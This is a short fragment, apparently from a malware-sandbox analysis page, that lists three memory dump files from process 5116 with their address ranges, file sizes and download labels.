memory/5116-66-0x0000000021820000-0x0000000021870000-memory.dmp

Filesize
320KB

Download
memory/5116-61-0x0000000000A00000-0x0000000001C54000-memory.dmp

Filesize
18.3MB

Download
memory/5116-69-0x0000000021900000-0x000000002190A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing